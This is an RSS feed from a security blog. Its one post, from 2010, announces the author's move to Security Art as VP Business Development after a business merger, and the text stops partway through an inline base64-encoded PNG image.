<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>I Am Security</title>
	<atom:link href="http://www.iamit.org/blog/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.iamit.org/blog</link>
	<description>Security news and research</description>
	<lastBuildDate>Tue, 31 Aug 2010 11:12:10 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
<cloud domain='www.iamit.org' port='80' path='/blog/?rsscloud=notify' registerProcedure='' protocol='http-post' />
		<item>
		<title>Security Innovation is now an Art</title>
		<link>http://www.iamit.org/blog/2010/08/security-innovation-is-an-art-now/</link>
		<comments>http://www.iamit.org/blog/2010/08/security-innovation-is-an-art-now/#comments</comments>
		<pubDate>Tue, 31 Aug 2010 10:51:21 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[Security Research]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/2010/08/security-innovation-is-an-art-now/</guid>
		<description><![CDATA[It’s very intriguing to see how our perceptions sometimes work against us &#8211; I have noted my “business” connections on LinkedIn regarding the recent merge of the Security &#38; Innovation business into Security Art as part of me joining it as VP Business Development. One of the first feedback I got arrived through twitter. the [...]


Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/06/cloud-security-alliance-conference-israel-cfp/' rel='bookmark' title='Permanent Link: Cloud Security Alliance Conference (Israel) &#8211; CFP'>Cloud Security Alliance Conference (Israel) &#8211; CFP</a></li>
<li><a href='http://www.iamit.org/blog/2009/01/social-networking-strikes-again/' rel='bookmark' title='Permanent Link: Social networking strikes again'>Social networking strikes again</a></li>
<li><a href='http://www.iamit.org/blog/2009/06/getting-a-business-degree-as-part-of-security-research/' rel='bookmark' title='Permanent Link: Getting a business degree as part of Security Research?'>Getting a business degree as part of Security Research?</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.iamit.org/blog/wp-content/uploads/2010/08/SecInnovArt.png" rel="lightbox[524]"><img class="alignright size-medium wp-image-525" title="SecInnovArt" src="http://www.iamit.org/blog/wp-content/uploads/2010/08/SecInnovArt-259x300.png" alt="" width="259" height="300" /></a>It’s very intriguing to see how our perceptions sometimes work against us &#8211; I have noted my “business” connections on LinkedIn regarding the recent merge of the <a href="http://www.securityandinnovation.com">Security &amp; Innovation</a> business into <a href="http://www.security-art.com">Security Art</a> as part of me joining it as VP Business Development.</p>
<p>One of the first feedback I got arrived through twitter. the next few came in to my inbox, then LinkedIn, more twitter, and some text messages. Wow. Have I realized that twitter got to be as important as LinkedIn was I would have tweeted my move there first <img src='http://www.iamit.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> . Anyway, to finalize the social media roundup if the news here it is:</p>
<p>After a long period of working alongside several great companies, I am proud to announce that the current activities of Security &amp; Innovations are merged with Security Art. Some of you are already familiar with the ongoing relationships between the companies, and now it’s official.  I’ll be serving as the Vice President for Business Development at Security Art starting immediately, and will continue to do what I enjoy the most &#8211; work<img class="alignleft" src="data:image/png;base64,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